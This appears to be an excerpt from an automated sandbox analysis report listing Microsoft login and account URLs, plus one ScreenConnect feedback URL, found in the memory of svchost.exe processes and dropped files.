                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000003.2075651104.0000021CA2757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwamvice
                  Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 00000006.00000003.2070539133.0000016BAB740000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.ecur
                  Source: svchost.exe, 00000007.00000003.2169106234.0000021CA2E1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2076123454.0000021CA2756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2076123454.0000021CA2756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075714432.0000021CA276B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075714432.0000021CA276B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000007.00000003.2075138929.0000021CA272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075714432.0000021CA276B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000007.00000002.3289021215.0000021CA2E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288225105.0000021CA1EEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2120616150.0000021CA1EDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srfce
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075714432.0000021CA276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075714432.0000021CA276B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000007.00000003.2075737545.0000021CA2727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000003.2075737545.0000021CA2727000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075714432.0000021CA276B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075714432.0000021CA276B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000007.00000003.2075737545.0000021CA2727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075714432.0000021CA276B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000007.00000003.2075138929.0000021CA272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075714432.0000021CA276B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000007.00000002.3289467505.0000021CA2E88000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2210392815.0000021CA275A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DuNDFuDhliAVCJGN6Lx4m
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfr
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2076123454.0000021CA2756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075714432.0000021CA276B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3289176199.0000021CA2E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000007.00000003.2075138929.0000021CA272C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfn
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2076123454.0000021CA2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000007.00000003.2075651104.0000021CA2757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000007.00000003.2075200909.0000021CA275A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3289021215.0000021CA2E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srfce
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000007.00000002.3289318932.0000021CA2E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
